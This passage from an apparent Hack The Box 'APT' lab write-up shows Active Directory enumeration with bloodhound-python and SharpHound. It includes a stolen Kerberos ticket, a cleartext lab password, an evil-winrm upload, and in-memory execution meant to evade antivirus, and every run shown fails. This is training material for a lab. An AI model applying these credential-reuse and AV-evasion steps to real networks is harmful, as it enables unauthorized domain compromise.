BloodHound
Ingestion must be performed in order to pull the domain data out of the target domain. I’ll be using bloodhound-python
Python Ingestior (fail)
┌──(kali㉿kali)-[~/…/htb/labs/apt/bloodhound]
└─$ KRB5CCNAME=../smb/hashdump/henry.vinson@apt.htb.local.ccache bloodhound-python -d HTB.LOCAL -u henry.vinson -k -no-pass -dc apt.htb.local -ns $IPv6 --dns-tcp --zip -c All -v
DEBUG: Resolved collection methods: acl, group, dcom, session, psremote, localadmin, objectprops, trusts, rdp
DEBUG: Using DNS to retrieve domain information
DEBUG: Querying domain controller information from DNS
DEBUG: Using domain hint: HTB.LOCAL
INFO: Found AD domain: htb.local
DEBUG: Found primary DC: apt.htb.local
DEBUG: Found Global Catalog server: apt.htb.local
DEBUG: Found KDC: apt.htb.local
DEBUG: Authentication: Kerberos ccache
DEBUG: Using kerberos credential cache: ../smb/hashdump/henry.vinson@apt.htb.local.ccache
DEBUG: Returning cached credential for KRBTGT/HTB.LOCAL@HTB.LOCAL
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
DEBUG: Using LDAP server: apt.htb.local
DEBUG: Using base DN: DC=htb,DC=local
DEBUG: Using kerberos KDC: apt.htb.local
DEBUG: Using kerberos realm: HTB.LOCAL
INFO: Connecting to LDAP server: apt.htb.local
DEBUG: Trying to connect to KDC at apt.htb.local:88
Traceback (most recent call last):
File "/home/kali/.local/bin/bloodhound-python", line 33, in <module>
sys.exit(load_entry_point('bloodhound', 'console_scripts', 'bloodhound-python')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Tools/BloodHound.py-Kerberos/bloodhound/__init__.py", line 348, in main
bloodhound.run(collect=collect,
File "/home/kali/Tools/BloodHound.py-Kerberos/bloodhound/__init__.py", line 89, in run
self.pdc.prefetch_info(
File "/home/kali/Tools/BloodHound.py-Kerberos/bloodhound/ad/domain.py", line 483, in prefetch_info
self.get_objecttype()
File "/home/kali/Tools/BloodHound.py-Kerberos/bloodhound/ad/domain.py", line 243, in get_objecttype
self.ldap_connect()
File "/home/kali/Tools/BloodHound.py-Kerberos/bloodhound/ad/domain.py", line 72, in ldap_connect
ldap = self.ad.auth.getLDAPConnection(hostname=self.hostname, ip=ip,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Tools/BloodHound.py-Kerberos/bloodhound/ad/authentication.py", line 87, in getLDAPConnection
bound = self.ldap_kerberos(conn, hostname)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Tools/BloodHound.py-Kerberos/bloodhound/ad/authentication.py", line 161, in ldap_kerberos
connection.open(read_server_info=False)
File "/usr/lib/python3/dist-packages/ldap3/strategy/sync.py", line 57, in open
BaseStrategy.open(self, reset_usage, read_server_info)
File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 146, in open
raise exception_history[0][0]
ldap3.core.exceptions.LDAPSocketOpenError: socket connection error while opening: [Errno 110] Connection timed outAttempting to ingest the domain information using the TGT of the henry.vinson user fails as the Python ingestor is unable to establish a connection with the target LDAP server
Upon successfully authenticating to the target KDC, the Python ingestor made an attempt to connect to the none existing LDAP server at the IPv4 address, instead of the IPv6 address.
This is rather an unexpected behavior, but I suspect that this is caused by the Python ingestor, as by default, resorts to the first type A record, which is the IPv4 address in this case
henry.vinson_adm
┌──(kali㉿kali)-[~/…/htb/labs/apt/bloodhound]
└─$ bloodhound-python -d HTB.LOCAL -u henry.vinson_adm -p 'G1#Ny5@2dvht' -dc apt.htb.local -ns $IPv6 --dns-tcp --zip -c All -v
debug: Authentication: username/password
debug: Resolved collection methods: group, acl, localadmin, rdp, psremote, dcom, session, objectprops, trusts
debug: Using DNS to retrieve domain information
debug: Querying domain controller information from DNS
debug: Using domain hint: HTB.LOCAL
info: Found AD domain: htb.local
debug: Found primary DC: apt.htb.local
debug: Found Global Catalog server: apt.htb.local
debug: Found KDC: apt.htb.local
info: Getting TGT for user
debug: Trying to connect to KDC at apt.htb.local:88
debug: Trying to connect to KDC at apt.htb.local:88
debug: Using LDAP server: apt.htb.local
debug: Using base DN: DC=htb,DC=local
debug: Using kerberos KDC: apt.htb.local
debug: Using kerberos realm: HTB.LOCAL
info: Connecting to LDAP server: apt.htb.local
debug: Trying to connect to KDC at apt.htb.local:88Same thing happens when authenticating with a CLEARTEXT credential
At this point, this is rather unnecessary since the henry.vinson_adm user, that is part of the Remote Management Users group, is compromised
SharpHound
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> upload SharpHound.ps1
Info: Uploading /home/kali/archive/htb/labs/apt/SharpHound.ps1 to C:\Users\henry.vinson_adm\Documents\SharpHound.ps1
Data: 1744464 bytes of 1744464 bytes copied
Info: Upload successful!Delivery complete
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> . .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> Invoke-BloodHound -CollectionMethods AllAttempting to run the ingestor seems to have failed. This might be due to the possible presence of AV
This would mean that regularly executing any program or PowerShell script is pretty much out of window
Invoke-Binary from evil-winrm
*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> Invoke-Binary SharpHound.exe
2023-10-23t20:31:14.7508831+01:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-10-23t20:31:14.7665215+01:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-10-23t20:31:14.7665215+01:00|INFORMATION|Initializing SharpHound at 8:31 PM on 10/23/2023
2023-10-23t20:31:14.7977876+01:00|WARNING|Common Library is already initialized
2023-10-23t20:31:14.7977876+01:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-10-23t20:31:14.8446435+01:00|INFORMATION|Beginning LDAP search for htb.local
2023-10-23t20:31:14.8602667+01:00|INFORMATION|Producer has finished, closing LDAP channel
2023-10-23t20:31:14.8602667+01:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-10-23t20:31:24.2844169+01:00|INFORMATION|Status: 1 objects finished (+0 0.0002603489)/s -- Using 121 MB RAM
2023-10-23t20:31:45.2870471+01:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 124 MB RAM
2023-10-23t20:31:54.2943721+01:00|INFORMATION|Status: 1 objects finished (+0 0.0002583312)/s -- Using 125 MB RAM
2023-10-23t20:31:58.8393659+01:00|INFORMATION|Consumers finished, closing output channel
2023-10-23t20:31:58.8549977+01:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-10-23t20:31:58.8549977+01:00|ERROR|Error running SharpHound: Access to the path 'C:\Windows\system32\20231023203158_gpos.json' is denied.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.StreamWriter.CreateFile(String path, Boolean append, Boolean checkHost)
at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding, Int32 bufferSize, Boolean checkHost)
at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding)
at Sharphound.Writers.JsonDataWriter`1.CreateFile()
at Sharphound.Writers.BaseWriter`1.<AcceptObject>d__6.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at Sharphound.Runtime.OutputWriter.<StartWriter>d__17.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at Sharphound.Runtime.CollectionTask.<StartCollection>d__10.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at Sharphound.SharpLinks.<AwaitBaseRunCompletion>d__6.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at Sharphound.Program.<>c__DisplayClass0_0.<<Main>b__1>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at CommandLine.ParserResultExtensions.<WithParsedAsync>d__20`1.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at Sharphound.Program.<Main>d__0.MoveNext()Using the same technique used for PEAS, I tried executing SharpHound.exe on memory with the Invoke-Binary cmdlet from evil-winrm
However, it failed